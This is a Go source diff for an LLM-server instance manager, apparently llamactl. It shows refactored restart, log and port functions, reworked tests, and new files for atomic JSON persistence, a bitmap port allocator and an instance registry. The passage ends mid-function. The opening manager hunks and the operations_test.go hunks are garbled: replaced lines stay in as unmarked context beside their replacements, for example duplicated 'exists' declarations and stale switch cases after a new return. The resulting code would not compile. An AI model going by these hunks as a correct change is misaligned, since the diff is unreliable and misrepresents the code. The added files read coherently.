+	inst, exists := im.registry.get(name)
-	if err != nil {
+	if !exists {
-		return nil, err
+		return nil, fmt.Errorf("instance with name %s not found", name)
 	}
-	return im.StartInstance(instance.Name)
+
 	// Check if instance is remote and delegate to remote operation
 	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		remoteInst, err := im.remote.restartInstance(ctx, node, name)
 		if err != nil {
 			return nil, err
 		}
 		// Update the local stub with all remote data (preserving Nodes)
 		im.updateLocalInstanceFromRemote(inst, remoteInst)
 		return inst, nil
 	}
 	// Lock this specific instance for the entire restart operation to ensure atomicity
 	lock := im.lockInstance(name)
 	lock.Lock()
 	defer lock.Unlock()
 	// Stop the instance
 	if inst.IsRunning() {
 		if err := inst.Stop(); err != nil {
 			return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
 		}
 	}
 	// Start the instance
 	if err := inst.Start(); err != nil {
 		return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
 	}
 	// Persist the restarted instance
 	if err := im.persistInstance(inst); err != nil {
 		log.Printf("Warning: failed to persist instance %s: %v", name, err)
 	}
 	return inst, nil
 }
 // GetInstanceLogs retrieves the logs for a specific instance by its name.
-func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
+func (im *instanceManager) GetInstanceLogs(name string, numLines int) (string, error) {
-	im.mu.RLock()
+	inst, exists := im.registry.get(name)
 	_, exists := im.instances[name]
 	im.mu.RUnlock()
 	if !exists {
 		return "", fmt.Errorf("instance with name %s not found", name)
 	}
-	// TODO: Implement actual log retrieval logic
+	// Check if instance is remote and delegate to remote operation
-	return fmt.Sprintf("Logs for instance %s", name), nil
+	if node := im.getNodeForInstance(inst); node != nil {
 		ctx := context.Background()
 		return im.remote.getInstanceLogs(ctx, node, name, numLines)
 	}
 	// Get logs from the local instance
 	return inst.GetLogs(numLines)
 }
 // getPortFromOptions extracts the port from backend-specific options
-func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
+func (im *instanceManager) getPortFromOptions(options *instance.Options) int {
-	switch options.BackendType {
+	return options.BackendOptions.GetPort()
 	case backends.BackendTypeLlamaCpp:
 		if options.LlamaServerOptions != nil {
 			return options.LlamaServerOptions.Port
 		}
 	case backends.BackendTypeMlxLm:
 		if options.MlxServerOptions != nil {
 			return options.MlxServerOptions.Port
 		}
 	case backends.BackendTypeVllm:
 		if options.VllmServerOptions != nil {
 			return options.VllmServerOptions.Port
 		}
 	}
 	return 0
 }
 // setPortInOptions sets the port in backend-specific options
-func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
+func (im *instanceManager) setPortInOptions(options *instance.Options, port int) {
-	switch options.BackendType {
+	options.BackendOptions.SetPort(port)
 	case backends.BackendTypeLlamaCpp:
 		if options.LlamaServerOptions != nil {
 			options.LlamaServerOptions.Port = port
 		}
 	case backends.BackendTypeMlxLm:
 		if options.MlxServerOptions != nil {
 			options.MlxServerOptions.Port = port
 		}
 	case backends.BackendTypeVllm:
 		if options.VllmServerOptions != nil {
 			options.VllmServerOptions.Port = port
 		}
 	}
 }
-// assignAndValidatePort assigns a port if not specified and validates it's not in use
+// EvictLRUInstance finds and stops the least recently used running instance.
-func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
+func (im *instanceManager) EvictLRUInstance() error {
-	currentPort := im.getPortFromOptions(options)
+	return im.lifecycle.evictLRU()
 	if currentPort == 0 {
 		// Assign a port if not specified
 		port, err := im.getNextAvailablePort()
 		if err != nil {
 			return fmt.Errorf("failed to get next available port: %w", err)
 		}
 		im.setPortInOptions(options, port)
 		// Mark the port as used
 		im.ports[port] = true
 	} else {
 		// Validate the specified port
 		if _, exists := im.ports[currentPort]; exists {
 			return fmt.Errorf("port %d is already in use", currentPort)
 		}
 		// Mark the port as used
 		im.ports[currentPort] = true
 	}
 	return nil
 }
--- a/pkg/manager/operations_test.go
+++ b/pkg/manager/operations_test.go
@@ -2,7 +2,6 @@ package manager_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
@@ -10,40 +9,14 @@ import (
 	"testing"
 )
-func TestCreateInstance_Success(t *testing.T) {
+func TestCreateInstance_FailsWithDuplicateName(t *testing.T) {
 	manager := createTestManager()
 	options := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  8080,
 		},
 	}
 	inst, err := manager.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	if inst.Name != "test-instance" {
 		t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
 	}
 	if inst.GetStatus() != instance.Stopped {
 		t.Error("New instance should not be running")
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
 	}
 }
 func TestCreateInstance_ValidationAndLimits(t *testing.T) {
 	// Test duplicate names
 	mngr := createTestManager()
-	options := &instance.CreateInstanceOptions{
+	options := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
+		BackendOptions: backends.Options{
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			BackendType: backends.BackendTypeLlamaCpp,
-			Model: "/path/to/model.gguf",
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
@@ -60,20 +33,35 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
 	if !strings.Contains(err.Error(), "already exists") {
 		t.Errorf("Expected duplicate name error, got: %v", err)
 	}
 }
-	// Test max instances limit
+func TestCreateInstance_FailsWhenMaxInstancesReached(t *testing.T) {
-	backendConfig := config.BackendConfig{
+	appConfig := &config.AppConfig{
-		LlamaExecutable: "llama-server",
+		Backends: config.BackendConfig{
-		MLXLMExecutable: "mlx_lm.server",
+			LlamaCpp: config.BackendSettings{
 				Command: "llama-server",
 			},
 		},
 		Instances: config.InstancesConfig{
 			PortRange:            [2]int{8000, 9000},
 			MaxInstances:         1, // Very low limit for testing
 			TimeoutCheckInterval: 5,
 		},
 		LocalNode: "main",
 		Nodes:     map[string]config.NodeConfig{},
 	}
-	cfg := config.InstancesConfig{
+	limitedManager := manager.New(appConfig)
 		PortRange:            [2]int{8000, 9000},
 		MaxInstances:         1, // Very low limit for testing
 		TimeoutCheckInterval: 5,
 	}
 	limitedManager := manager.NewInstanceManager(backendConfig, cfg)
-	_, err = limitedManager.CreateInstance("instance1", options)
+	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
 	_, err := limitedManager.CreateInstance("instance1", options)
 	if err != nil {
 		t.Fatalf("CreateInstance 1 failed: %v", err)
 	}
@@ -88,33 +76,32 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
 	}
 }
-func TestPortManagement(t *testing.T) {
+func TestCreateInstance_FailsWithPortConflict(t *testing.T) {
 	manager := createTestManager()
-	// Test auto port assignment
+	options1 := &instance.Options{
-	options1 := &instance.CreateInstanceOptions{
+		BackendOptions: backends.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
+			BackendType: backends.BackendTypeLlamaCpp,
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			LlamaServerOptions: &backends.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
+				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
 		},
 	}
-	inst1, err := manager.CreateInstance("instance1", options1)
+	_, err := manager.CreateInstance("instance1", options1)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
-	port1 := inst1.GetPort()
+	// Try to create instance with same port
-	if port1 < 8000 || port1 > 9000 {
+	options2 := &instance.Options{
-		t.Errorf("Expected port in range 8000-9000, got %d", port1)
+		BackendOptions: backends.Options{
-	}
+			BackendType: backends.BackendTypeLlamaCpp,
-
+			LlamaServerOptions: &backends.LlamaServerOptions{
-	// Test port conflict detection
+				Model: "/path/to/model2.gguf",
-	options2 := &instance.CreateInstanceOptions{
+				Port:  8080, // Same port - should conflict
-		BackendType: backends.BackendTypeLlamaCpp,
+			},
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model2.gguf",
 			Port:  port1, // Same port - should conflict
 		},
 	}
@@ -125,98 +112,21 @@ func TestPortManagement(t *testing.T) {
 	if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
 		t.Errorf("Expected port conflict error, got: %v", err)
 	}
 	// Test port release on deletion
 	specificPort := 8080
 	options3 := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 			Port:  specificPort,
 		},
 	}
 	_, err = manager.CreateInstance("port-test", options3)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	err = manager.DeleteInstance("port-test")
 	if err != nil {
 		t.Fatalf("DeleteInstance failed: %v", err)
 	}
 	// Should be able to create new instance with same port
 	_, err = manager.CreateInstance("new-port-test", options3)
 	if err != nil {
 		t.Errorf("Expected to reuse port after deletion, got error: %v", err)
 	}
 }
-func TestInstanceOperations(t *testing.T) {
+func TestInstanceOperations_FailWithNonExistentInstance(t *testing.T) {
 	manager := createTestManager()
-	options := &instance.CreateInstanceOptions{
+	options := &instance.Options{
-		BackendType: backends.BackendTypeLlamaCpp,
+		BackendOptions: backends.Options{
-		LlamaServerOptions: &llamacpp.LlamaServerOptions{
+			BackendType: backends.BackendTypeLlamaCpp,
-			Model: "/path/to/model.gguf",
+			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 			},
 		},
 	}
-	// Create instance
+	_, err := manager.GetInstance("nonexistent")
 	created, err := manager.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Get instance
 	retrieved, err := manager.GetInstance("test-instance")
 	if err != nil {
 		t.Fatalf("GetInstance failed: %v", err)
 	}
 	if retrieved.Name != created.Name {
 		t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
 	}
 	// Update instance
 	newOptions := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/new-model.gguf",
 			Port:  8081,
 		},
 	}
 	updated, err := manager.UpdateInstance("test-instance", newOptions)
 	if err != nil {
 		t.Fatalf("UpdateInstance failed: %v", err)
 	}
 	if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
 		t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
 	}
 	// List instances
 	instances, err := manager.ListInstances()
 	if err != nil {
 		t.Fatalf("ListInstances failed: %v", err)
 	}
 	if len(instances) != 1 {
 		t.Errorf("Expected 1 instance, got %d", len(instances))
 	}
 	// Delete instance
 	err = manager.DeleteInstance("test-instance")
 	if err != nil {
 		t.Fatalf("DeleteInstance failed: %v", err)
 	}
 	_, err = manager.GetInstance("test-instance")
 	if err == nil {
 		t.Error("Instance should not exist after deletion")
 	}
 	// Test operations on non-existent instances
 	_, err = manager.GetInstance("nonexistent")
 	if err == nil || !strings.Contains(err.Error(), "not found") {
 		t.Errorf("Expected 'not found' error, got: %v", err)
 	}
@@ -231,3 +141,143 @@ func TestInstanceOperations(t *testing.T) {
 		t.Errorf("Expected 'not found' error, got: %v", err)
 	}
 }
 // TestDeleteInstance_RunningInstanceFails creates and starts an instance, then
 // checks that DeleteInstance reports an error for it.
 func TestDeleteInstance_RunningInstanceFails(t *testing.T) {
 	const name = "test-instance"
 	m := createTestManager()
 	defer m.Shutdown()
 	llamaOpts := &backends.LlamaServerOptions{Model: "/path/to/model.gguf"}
 	opts := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType:        backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: llamaOpts,
 		},
 	}
 	if _, err := m.CreateInstance(name, opts); err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	if _, err := m.StartInstance(name); err != nil {
 		t.Fatalf("StartInstance failed: %v", err)
 	}
 	// Deleting while the instance is started must be rejected.
 	if err := m.DeleteInstance(name); err == nil {
 		t.Error("Expected error when deleting running instance")
 	}
 }
 func TestUpdateInstance(t *testing.T) {
 	mgr := createTestManager()
 	defer mgr.Shutdown()
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
 		},
 	}
 	_, err := mgr.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	_, err = mgr.StartInstance("test-instance")
 	if err != nil {
 		t.Fatalf("StartInstance failed: %v", err)
 	}
 	// Update running instance with new model
 	newOptions := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/new-model.gguf",
 				Port:  8080,
 			},
 		},
 	}
 	updated, err := mgr.UpdateInstance("test-instance", newOptions)
 	if err != nil {
 		t.Fatalf("UpdateInstance failed: %v", err)
 	}
 	// Should still be running after update
 	if !updated.IsRunning() {
 		t.Error("Instance should be running after update")
 	}
 	if updated.GetOptions().BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
 		t.Errorf("Expected model to be updated")
 	}
 }
 func TestUpdateInstance_ReleasesOldPort(t *testing.T) {
 	mgr := createTestManager()
 	defer mgr.Shutdown()
 	options := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8080,
 			},
 		},
 	}
 	inst, err := mgr.CreateInstance("test-instance", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	if inst.GetPort() != 8080 {
 		t.Errorf("Expected port 8080, got %d", inst.GetPort())
 	}
 	// Update with new port
 	newOptions := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model.gguf",
 				Port:  8081,
 			},
 		},
 	}
 	updated, err := mgr.UpdateInstance("test-instance", newOptions)
 	if err != nil {
 		t.Fatalf("UpdateInstance failed: %v", err)
 	}
 	if updated.GetPort() != 8081 {
 		t.Errorf("Expected port 8081, got %d", updated.GetPort())
 	}
 	// Old port should be released - try to create new instance with old port
 	options2 := &instance.Options{
 		BackendOptions: backends.Options{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &backends.LlamaServerOptions{
 				Model: "/path/to/model2.gguf",
 				Port:  8080,
 			},
 		},
 	}
 	_, err = mgr.CreateInstance("test-instance-2", options2)
 	if err != nil {
 		t.Errorf("Should be able to use old port 8080: %v", err)
 	}
 }
--- a/pkg/manager/persistence.go
+++ b/pkg/manager/persistence.go
@@ -0,0 +1,223 @@
 package manager
 import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/instance"
 	"log"
 	"os"
 	"path/filepath"
 	"strings"
 	"sync"
 )
 // instancePersister provides atomic file-based persistence with durability guarantees.
 // Each instance is stored as "<name>.json" inside instancesDir. save writes to a
 // ".tmp" sibling file, syncs it, and then renames it over the final path.
 type instancePersister struct {
 	mu           sync.Mutex // held by save, delete and loadAll while they touch the filesystem
 	instancesDir string     // directory that holds the per-instance JSON files
 	enabled      bool       // false when no directory was configured; save, delete and loadAll then return immediately
 }
 // newInstancePersister builds a persister rooted at instancesDir.
 // An empty instancesDir yields a disabled persister and touches nothing on disk.
 // Otherwise the directory (and any missing parents) is created with mode 0755,
 // and a failure to do so is returned wrapped.
 func newInstancePersister(instancesDir string) (*instancePersister, error) {
 	persister := &instancePersister{}
 	if instancesDir != "" {
 		if err := os.MkdirAll(instancesDir, 0755); err != nil {
 			return nil, fmt.Errorf("failed to create instances directory: %w", err)
 		}
 		persister.instancesDir = instancesDir
 		persister.enabled = true
 	}
 	return persister, nil
 }
 // save writes inst to "<name>.json" in the instances directory.
 // The JSON is first written to "<name>.json.tmp", synced and closed, and only
 // then renamed over the final path. On any failure after the temp file has
 // been created, the temp file is removed before the error is returned.
 // Returns nil without doing anything when persistence is disabled.
 func (p *instancePersister) save(inst *instance.Instance) error {
 	switch {
 	case !p.enabled:
 		return nil
 	case inst == nil:
 		return fmt.Errorf("cannot save nil instance")
 	}
 	// Reject names that could escape the instances directory.
 	safeName, err := p.validateInstanceName(inst.Name)
 	if err != nil {
 		return err
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	finalPath := filepath.Join(p.instancesDir, safeName+".json")
 	stagingPath := finalPath + ".tmp"
 	payload, err := json.MarshalIndent(inst, "", "  ")
 	if err != nil {
 		return fmt.Errorf("failed to marshal instance %s: %w", inst.Name, err)
 	}
 	staging, err := os.OpenFile(stagingPath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0644)
 	if err != nil {
 		return fmt.Errorf("failed to create temp file for instance %s: %w", inst.Name, err)
 	}
 	// discard removes the staging file, closing the handle first when it is still open.
 	discard := func(stillOpen bool) {
 		if stillOpen {
 			staging.Close()
 		}
 		os.Remove(stagingPath)
 	}
 	if _, err = staging.Write(payload); err != nil {
 		discard(true)
 		return fmt.Errorf("failed to write temp file for instance %s: %w", inst.Name, err)
 	}
 	// Flush file contents to disk before the rename makes them visible.
 	if err = staging.Sync(); err != nil {
 		discard(true)
 		return fmt.Errorf("failed to sync temp file for instance %s: %w", inst.Name, err)
 	}
 	if err = staging.Close(); err != nil {
 		discard(false)
 		return fmt.Errorf("failed to close temp file for instance %s: %w", inst.Name, err)
 	}
 	// Rename replaces the previous file in one step (atomic on POSIX systems).
 	if err = os.Rename(stagingPath, finalPath); err != nil {
 		discard(false)
 		return fmt.Errorf("failed to rename temp file for instance %s: %w", inst.Name, err)
 	}
 	return nil
 }
 // delete removes the "<name>.json" file for the named instance.
 // A file that does not exist is treated as success. Returns nil without doing
 // anything when persistence is disabled, and an error when the name fails
 // validation or the removal fails for any other reason.
 func (p *instancePersister) delete(name string) error {
 	if !p.enabled {
 		return nil
 	}
 	safeName, err := p.validateInstanceName(name)
 	if err != nil {
 		return err
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	target := filepath.Join(p.instancesDir, safeName+".json")
 	err = os.Remove(target)
 	// Nothing to delete counts as already deleted.
 	if err == nil || os.IsNotExist(err) {
 		return nil
 	}
 	return fmt.Errorf("failed to delete instance file for %s: %w", name, err)
 }
 // loadAll reads every "*.json" file in the instances directory.
 // Files that fail to load are logged and skipped; they do not make loadAll
 // fail. An error is returned only when the directory itself cannot be read.
 // Returns (nil, nil) when persistence is disabled or the directory is missing.
 func (p *instancePersister) loadAll() ([]*instance.Instance, error) {
 	if !p.enabled {
 		return nil, nil
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	// A missing directory simply means nothing has been persisted yet.
 	if _, statErr := os.Stat(p.instancesDir); os.IsNotExist(statErr) {
 		return nil, nil
 	}
 	entries, err := os.ReadDir(p.instancesDir)
 	if err != nil {
 		return nil, fmt.Errorf("failed to read instances directory: %w", err)
 	}
 	loaded := []*instance.Instance{}
 	var failures []string
 	for _, entry := range entries {
 		// Only regular "*.json" entries are instance files.
 		if entry.IsDir() || !strings.HasSuffix(entry.Name(), ".json") {
 			continue
 		}
 		name := strings.TrimSuffix(entry.Name(), ".json")
 		inst, loadErr := p.loadInstanceFile(name, filepath.Join(p.instancesDir, entry.Name()))
 		if loadErr != nil {
 			log.Printf("Failed to load instance %s: %v", name, loadErr)
 			failures = append(failures, fmt.Sprintf("%s: %v", name, loadErr))
 			continue
 		}
 		loaded = append(loaded, inst)
 	}
 	switch {
 	case len(failures) > 0:
 		log.Printf("Loaded %d instances with %d errors", len(loaded), len(failures))
 	case len(loaded) > 0:
 		log.Printf("Loaded %d instances from persistence", len(loaded))
 	}
 	return loaded, nil
 }
 // loadInstanceFile reads the file at path, decodes it as JSON into an instance,
 // and rejects it when the decoded Name differs from name (the file name
 // without its ".json" suffix, as passed by loadAll).
 // It takes no lock itself; the caller is expected to hold p.mu.
 func (p *instancePersister) loadInstanceFile(name, path string) (*instance.Instance, error) {
 	raw, readErr := os.ReadFile(path)
 	if readErr != nil {
 		return nil, fmt.Errorf("failed to read instance file: %w", readErr)
 	}
 	loaded := new(instance.Instance)
 	if decodeErr := json.Unmarshal(raw, loaded); decodeErr != nil {
 		return nil, fmt.Errorf("failed to unmarshal instance: %w", decodeErr)
 	}
 	// The file name and the stored name must agree.
 	if loaded.Name != name {
 		return nil, fmt.Errorf("instance name mismatch: file=%s, instance.Name=%s", name, loaded.Name)
 	}
 	return loaded, nil
 }
 // validateInstanceName checks that name can be used as a file name inside the
 // instances directory. It rejects the empty string, any name containing "/",
 // "\" or "..", and any name starting with ".".
 // On success the name is returned unchanged.
 func (p *instancePersister) validateInstanceName(name string) (string, error) {
 	switch {
 	case name == "":
 		return "", fmt.Errorf("instance name cannot be empty")
 	case strings.ContainsAny(name, "/\\"), strings.Contains(name, ".."):
 		// Separators and parent references could point outside the directory.
 		return "", fmt.Errorf("invalid instance name: %s (cannot contain path separators or '..')", name)
 	case strings.HasPrefix(name, "."):
 		// A leading dot would create a hidden file.
 		return "", fmt.Errorf("invalid instance name: %s (cannot start with '.')", name)
 	}
 	return name, nil
 }
--- a/pkg/manager/ports.go
+++ b/pkg/manager/ports.go
@@ -0,0 +1,184 @@
 package manager
 import (
 	"fmt"
 	"math/bits"
 	"sync"
 )
 // portAllocator hands out ports from the inclusive range [minPort, maxPort].
 // Allocation state is kept in a bitmap sized from the range, so memory use is
 // fixed at construction. Setting, clearing and testing a single port are
 // constant-time bit operations; finding a free port scans the bitmap one
 // 64-bit word at a time.
 type portAllocator struct {
 	mu sync.Mutex
 	// Bitmap of allocation state.
 	// Each bit represents a port (1 = allocated, 0 = free); bit 0 of word 0 is minPort.
 	bitmap []uint64 // Each uint64 covers 64 ports
 	// Map port to instance name for cleanup operations
 	allocated map[int]string
 	minPort   int // lowest port that can be allocated
 	maxPort   int // highest port that can be allocated
 	rangeSize int // maxPort - minPort + 1
 }
 // newPortAllocator builds an allocator for the inclusive range [minPort, maxPort].
 // Both bounds must be positive and minPort must not exceed maxPort; otherwise
 // an error is returned.
 func newPortAllocator(minPort, maxPort int) (*portAllocator, error) {
 	switch {
 	case minPort <= 0 || maxPort <= 0:
 		return nil, fmt.Errorf("invalid port range: min=%d, max=%d (must be > 0)", minPort, maxPort)
 	case minPort > maxPort:
 		return nil, fmt.Errorf("invalid port range: min=%d > max=%d", minPort, maxPort)
 	}
 	const bitsPerWord = 64
 	span := maxPort - minPort + 1
 	// Round up so a partially used final word is still allocated.
 	words := (span + bitsPerWord - 1) / bitsPerWord
 	allocator := &portAllocator{
 		minPort:   minPort,
 		maxPort:   maxPort,
 		rangeSize: span,
 		allocated: make(map[int]string),
 		bitmap:    make([]uint64, words),
 	}
 	return allocator, nil
 }
 // allocate reserves the lowest free port in the range for instanceName and
 // returns it. It fails when instanceName is empty or no port is free.
 func (p *portAllocator) allocate(instanceName string) (int, error) {
 	if instanceName == "" {
 		return 0, fmt.Errorf("instance name cannot be empty")
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	freePort, err := p.findFirstFreeBit()
 	if err == nil {
 		p.setBit(freePort)
 		p.allocated[freePort] = instanceName
 		return freePort, nil
 	}
 	return 0, err
 }
 // allocateSpecific reserves exactly the given port for instanceName.
 // It fails when instanceName is empty, when port lies outside
 // [minPort, maxPort], or when the port is already allocated.
 func (p *portAllocator) allocateSpecific(port int, instanceName string) error {
 	if instanceName == "" {
 		return fmt.Errorf("instance name cannot be empty")
 	}
 	if inRange := p.minPort <= port && port <= p.maxPort; !inRange {
 		return fmt.Errorf("port %d is out of range [%d-%d]", port, p.minPort, p.maxPort)
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	if taken := p.isBitSet(port); taken {
 		return fmt.Errorf("port %d is already allocated", port)
 	}
 	p.allocated[port] = instanceName
 	p.setBit(port)
 	return nil
 }
 // release frees the given port so it can be allocated again.
 // It fails when port lies outside [minPort, maxPort] or is not currently
 // allocated.
 func (p *portAllocator) release(port int) error {
 	if inRange := p.minPort <= port && port <= p.maxPort; !inRange {
 		return fmt.Errorf("port %d is out of range [%d-%d]", port, p.minPort, p.maxPort)
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	if held := p.isBitSet(port); !held {
 		return fmt.Errorf("port %d is not allocated", port)
 	}
 	delete(p.allocated, port)
 	p.clearBit(port)
 	return nil
 }
 // releaseByInstance frees every port recorded as belonging to instanceName
 // and returns how many were freed. An empty instanceName frees nothing.
 func (p *portAllocator) releaseByInstance(instanceName string) int {
 	if instanceName == "" {
 		return 0
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	released := 0
 	// Removing entries from a map while ranging over it is permitted in Go.
 	for port, owner := range p.allocated {
 		if owner != instanceName {
 			continue
 		}
 		p.clearBit(port)
 		delete(p.allocated, port)
 		released++
 	}
 	return released
 }
 // --- Internal bitmap operations ---
 // portToBitPos maps a port to its location in the bitmap: index is the word
 // that holds the port and bit is the position inside that word, both derived
 // from the port's offset from minPort.
 func (p *portAllocator) portToBitPos(port int) (index int, bit uint) {
 	relative := port - p.minPort
 	return relative / 64, uint(relative % 64)
 }
 // setBit turns on the bitmap bit for port, marking it allocated.
 func (p *portAllocator) setBit(port int) {
 	word, shift := p.portToBitPos(port)
 	mask := uint64(1) << shift
 	p.bitmap[word] = p.bitmap[word] | mask
 }
 // clearBit turns off the bitmap bit for port, marking it free.
 func (p *portAllocator) clearBit(port int) {
 	word, shift := p.portToBitPos(port)
 	mask := uint64(1) << shift
 	p.bitmap[word] = p.bitmap[word] &^ mask
 }
 // isBitSet reports whether the bitmap bit for port is on (port allocated).
 func (p *portAllocator) isBitSet(port int) bool {
 	word, shift := p.portToBitPos(port)
 	mask := uint64(1) << shift
 	return p.bitmap[word]&mask != 0
 }
 // findFirstFreeBit returns the lowest unallocated port, scanning the bitmap
 // one word at a time. It returns an error when every port in
 // [minPort, maxPort] is allocated.
 func (p *portAllocator) findFirstFreeBit() (int, error) {
 	const fullWord = ^uint64(0)
 	for wordIdx, word := range p.bitmap {
 		if word == fullWord {
 			continue // all 64 ports in this word are taken
 		}
 		// Complementing the word turns free bits into 1s; the number of
 		// trailing zeros is then the position of the lowest free bit.
 		candidate := p.minPort + wordIdx*64 + bits.TrailingZeros64(^word)
 		// The final word may extend past maxPort because of rounding.
 		if candidate > p.maxPort {
 			continue
 		}
 		return candidate, nil
 	}
 	return 0, fmt.Errorf("no available ports in range [%d-%d]", p.minPort, p.maxPort)
 }
--- a/pkg/manager/registry.go
+++ b/pkg/manager/registry.go
@@ -0,0 +1,121 @@
 package manager
 import (
 	"fmt"
 	"llamactl/pkg/instance"
 	"sync"
 )
 // instanceRegistry stores instances by name and tracks which of them are
 // marked as running. The instances map is guarded by mu; the running set is a
 // separate sync.Map so that markRunning, markStopped and isRunning do not
 // take mu.
 type instanceRegistry struct {
 	mu        sync.RWMutex                  // guards instances
 	instances map[string]*instance.Instance // instance name -> instance
 	running   sync.Map                      // map[string]struct{} - names currently marked running
 }
 // newInstanceRegistry returns an empty registry ready for use.
 func newInstanceRegistry() *instanceRegistry {
 	registry := new(instanceRegistry)
 	registry.instances = map[string]*instance.Instance{}
 	return registry
 }
 // get looks up an instance by name under the read lock.
 // The boolean is true when the name is registered; otherwise the returned
 // instance is nil.
 func (r *instanceRegistry) get(name string) (*instance.Instance, bool) {
 	r.mu.RLock()
 	found, ok := r.instances[name]
 	r.mu.RUnlock()
 	return found, ok
 }
 // list returns a new slice holding every registered instance. The slice is a
 // copy, so callers may modify it freely; the instance pointers themselves are
 // shared with the registry.
 func (r *instanceRegistry) list() []*instance.Instance {
 	r.mu.RLock()
 	defer r.mu.RUnlock()
 	snapshot := make([]*instance.Instance, len(r.instances))
 	next := 0
 	for _, inst := range r.instances {
 		snapshot[next] = inst
 		next++
 	}
 	return snapshot
 }
 // listRunning returns a new slice holding the registered instances whose
 // names are currently present in the running set.
 func (r *instanceRegistry) listRunning() []*instance.Instance {
 	r.mu.RLock()
 	defer r.mu.RUnlock()
 	active := []*instance.Instance{}
 	for name := range r.instances {
 		if _, marked := r.running.Load(name); !marked {
 			continue
 		}
 		active = append(active, r.instances[name])
 	}
 	return active
 }
 // add registers inst under its Name. It fails when inst is nil or when the
 // name is already registered. If inst reports IsRunning, it is also placed
 // in the running set.
 func (r *instanceRegistry) add(inst *instance.Instance) error {
 	if inst == nil {
 		return fmt.Errorf("cannot add nil instance")
 	}
 	r.mu.Lock()
 	defer r.mu.Unlock()
 	name := inst.Name
 	if _, taken := r.instances[name]; taken {
 		return fmt.Errorf("instance %s already exists", name)
 	}
 	r.instances[name] = inst
 	// Seed the running set from the instance's own state.
 	if inst.IsRunning() {
 		r.running.Store(name, struct{}{})
 	}
 	return nil
 }
 // remove unregisters the named instance and drops it from the running set.
 // It fails when the name is not registered.
 func (r *instanceRegistry) remove(name string) error {
 	r.mu.Lock()
 	defer r.mu.Unlock()
 	if _, known := r.instances[name]; known {
 		delete(r.instances, name)
 		r.running.Delete(name)
 		return nil
 	}
